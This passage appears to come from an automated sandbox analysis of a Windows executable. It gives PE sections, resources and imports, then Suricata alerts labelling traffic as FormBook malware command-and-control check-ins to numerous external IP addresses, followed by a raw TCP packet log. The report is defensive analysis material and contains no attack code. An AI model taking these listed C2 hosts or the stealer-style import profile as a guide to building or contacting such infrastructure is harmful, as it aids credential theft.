IMAGE_DIRECTORY_ENTRY_BASERELOC	0x132000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x5d9f4	0x5da00	e82d1843106f4113b8f69a7495b0bf87	False	0.9304202478304406	data	7.8985411839203055	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x132000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x54cba	data			1.00033398402635
RT_GROUP_ICON	0x131474	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1314ec	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x131500	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x131514	0x14	data	English	Great Britain	1.25
RT_VERSION	0x131528	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x131604	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-06T07:59:39.942293+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49752	80	192.168.2.7	68.183.37.14
2024-08-06T07:57:59.609915+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49726	80	192.168.2.7	154.23.184.207
2024-08-06T07:58:50.116791+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49740	80	192.168.2.7	203.161.46.201
2024-08-06T07:57:10.827378+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49710	80	192.168.2.7	176.57.64.102
2024-08-06T07:58:52.643005+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49741	80	192.168.2.7	203.161.46.201
2024-08-06T07:59:53.509352+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49756	80	192.168.2.7	178.63.50.103
2024-08-06T07:57:27.029504+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49716	80	192.168.2.7	45.33.30.197
2024-08-06T07:58:12.930171+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49730	80	192.168.2.7	194.195.220.41
2024-08-06T07:58:35.113758+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49736	80	192.168.2.7	103.42.108.46
2024-08-06T07:58:07.843193+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49728	80	192.168.2.7	194.195.220.41
2024-08-06T07:57:29.613621+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49717	80	192.168.2.7	45.33.30.197
2024-08-06T08:00:05.093330+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49759	80	192.168.2.7	64.64.253.144
2024-08-06T07:59:45.033668+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49754	80	192.168.2.7	68.183.37.14
2024-08-06T08:00:23.513672+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49765	80	192.168.2.7	104.21.17.191
2024-08-06T07:59:29.214920+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49749	80	192.168.2.7	198.54.126.42
2024-08-06T08:00:07.612102+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49760	80	192.168.2.7	64.64.253.144
2024-08-06T07:59:24.118869+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49747	80	192.168.2.7	198.54.126.42
2024-08-06T08:00:10.153366+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49761	80	192.168.2.7	64.64.253.144
2024-08-06T07:58:10.399460+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49729	80	192.168.2.7	194.195.220.41
2024-08-06T07:59:06.504244+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49745	80	192.168.2.7	45.76.85.183
2024-08-06T08:00:18.404727+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49763	80	192.168.2.7	104.21.17.191
2024-08-06T07:58:23.677598+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49733	80	192.168.2.7	13.248.169.48
2024-08-06T07:58:55.194048+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49742	80	192.168.2.7	203.161.46.201
2024-08-06T07:59:43.074646+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49753	80	192.168.2.7	68.183.37.14
2024-08-06T07:57:54.505824+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49724	80	192.168.2.7	154.23.184.207
2024-08-06T08:00:20.964440+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49764	80	192.168.2.7	104.21.17.191
2024-08-06T07:59:58.615177+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49758	80	192.168.2.7	178.63.50.103
2024-08-06T07:57:45.939722+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49722	80	192.168.2.7	141.94.102.188
2024-08-06T07:59:03.948130+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49744	80	192.168.2.7	45.76.85.183
2024-08-06T07:57:51.953300+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49723	80	192.168.2.7	154.23.184.207
2024-08-06T07:57:38.370909+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49719	80	192.168.2.7	141.94.102.188
2024-08-06T07:58:21.301226+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49732	80	192.168.2.7	13.248.169.48
2024-08-06T07:58:26.233722+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49734	80	192.168.2.7	13.248.169.48
2024-08-06T07:58:47.559889+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49739	80	192.168.2.7	203.161.46.201
2024-08-06T07:57:13.439571+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49711	80	192.168.2.7	176.57.64.102
2024-08-06T07:59:50.994732+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49755	80	192.168.2.7	178.63.50.103
2024-08-06T07:57:15.964861+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49712	80	192.168.2.7	176.57.64.102
2024-08-06T07:57:24.473740+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49715	80	192.168.2.7	45.33.30.197
2024-08-06T07:59:37.400183+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49751	80	192.168.2.7	68.183.37.14
2024-08-06T08:00:12.699416+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49762	80	192.168.2.7	64.64.253.144
2024-08-06T07:56:55.011639+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49709	80	192.168.2.7	85.159.66.93
2024-08-06T07:59:01.399765+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49743	80	192.168.2.7	45.76.85.183
2024-08-06T08:00:26.044337+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49766	80	192.168.2.7	104.21.17.191
2024-08-06T07:58:37.683326+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49737	80	192.168.2.7	103.42.108.46
2024-08-06T07:59:26.650839+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49748	80	192.168.2.7	198.54.126.42
2024-08-06T07:59:56.055489+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49757	80	192.168.2.7	178.63.50.103
2024-08-06T07:58:18.605687+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49731	80	192.168.2.7	13.248.169.48
2024-08-06T07:57:32.128549+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49718	80	192.168.2.7	45.33.30.197
2024-08-06T07:59:09.041699+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49746	80	192.168.2.7	45.76.85.183
2024-08-06T07:57:41.067635+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49720	80	192.168.2.7	141.94.102.188
2024-08-06T07:57:43.991574+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49721	80	192.168.2.7	141.94.102.188
2024-08-06T07:58:40.330268+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49738	80	192.168.2.7	103.42.108.46
2024-08-06T07:57:57.087564+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49725	80	192.168.2.7	154.23.184.207
2024-08-06T07:59:31.757828+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49750	80	192.168.2.7	198.54.126.42
2024-08-06T07:58:32.568645+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49735	80	192.168.2.7	103.42.108.46
2024-08-06T07:57:18.625323+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49714	80	192.168.2.7	176.57.64.102
2024-08-06T07:58:05.283975+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49727	80	192.168.2.7	194.195.220.41

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 6, 2024 07:56:53.645154953 CEST	49709	80	192.168.2.7	85.159.66.93
Aug 6, 2024 07:56:53.650275946 CEST	80	49709	85.159.66.93	192.168.2.7
Aug 6, 2024 07:56:53.650408983 CEST	49709	80	192.168.2.7	85.159.66.93
Aug 6, 2024 07:56:53.660041094 CEST	49709	80	192.168.2.7	85.159.66.93
Aug 6, 2024 07:56:53.664959908 CEST	80	49709	85.159.66.93	192.168.2.7
Aug 6, 2024 07:56:55.011357069 CEST	80	49709	85.159.66.93	192.168.2.7
Aug 6, 2024 07:56:55.011423111 CEST	80	49709	85.159.66.93	192.168.2.7
Aug 6, 2024 07:56:55.011461020 CEST	80	49709	85.159.66.93	192.168.2.7
Aug 6, 2024 07:56:55.011553049 CEST	80	49709	85.159.66.93	192.168.2.7
Aug 6, 2024 07:56:55.011639118 CEST	49709	80	192.168.2.7	85.159.66.93
Aug 6, 2024 07:56:55.013365984 CEST	49709	80	192.168.2.7	85.159.66.93
Aug 6, 2024 07:56:55.014936924 CEST	49709	80	192.168.2.7	85.159.66.93
Aug 6, 2024 07:56:55.019828081 CEST	80	49709	85.159.66.93	192.168.2.7
Aug 6, 2024 07:57:10.148542881 CEST	49710	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:10.153394938 CEST	80	49710	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:10.153552055 CEST	49710	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:10.165349007 CEST	49710	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:10.170120001 CEST	80	49710	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:10.827244997 CEST	80	49710	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:10.827316999 CEST	80	49710	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:10.827378035 CEST	49710	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:11.679025888 CEST	49710	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:12.697741032 CEST	49711	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:12.761564970 CEST	80	49711	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:12.765399933 CEST	49711	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:12.777146101 CEST	49711	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:12.781985044 CEST	80	49711	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:13.439352036 CEST	80	49711	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:13.439479113 CEST	80	49711	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:13.439570904 CEST	49711	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:14.288398981 CEST	49711	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:15.307249069 CEST	49712	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:15.312299967 CEST	80	49712	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:15.312398911 CEST	49712	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:15.325762987 CEST	49712	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:15.330565929 CEST	80	49712	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:15.330653906 CEST	80	49712	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:15.964762926 CEST	80	49712	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:15.964796066 CEST	80	49712	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:15.964860916 CEST	49712	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:16.835416079 CEST	49712	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:17.854628086 CEST	49714	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:17.859493971 CEST	80	49714	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:17.859570980 CEST	49714	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:17.869453907 CEST	49714	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:17.874294996 CEST	80	49714	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:18.624999046 CEST	80	49714	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:18.625118017 CEST	80	49714	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:18.625323057 CEST	49714	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:18.628067017 CEST	49714	80	192.168.2.7	176.57.64.102
Aug 6, 2024 07:57:18.632819891 CEST	80	49714	176.57.64.102	192.168.2.7
Aug 6, 2024 07:57:23.947330952 CEST	49715	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:23.952207088 CEST	80	49715	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:23.952327013 CEST	49715	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:23.968441963 CEST	49715	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:23.973421097 CEST	80	49715	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:24.473535061 CEST	80	49715	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:24.473675013 CEST	80	49715	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:24.473740101 CEST	49715	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:25.476186037 CEST	49715	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:26.494673967 CEST	49716	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:26.499562979 CEST	80	49716	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:26.499728918 CEST	49716	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:26.522501945 CEST	49716	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:26.527390003 CEST	80	49716	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:27.029304028 CEST	80	49716	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:27.029426098 CEST	80	49716	45.33.30.197	192.168.2.7
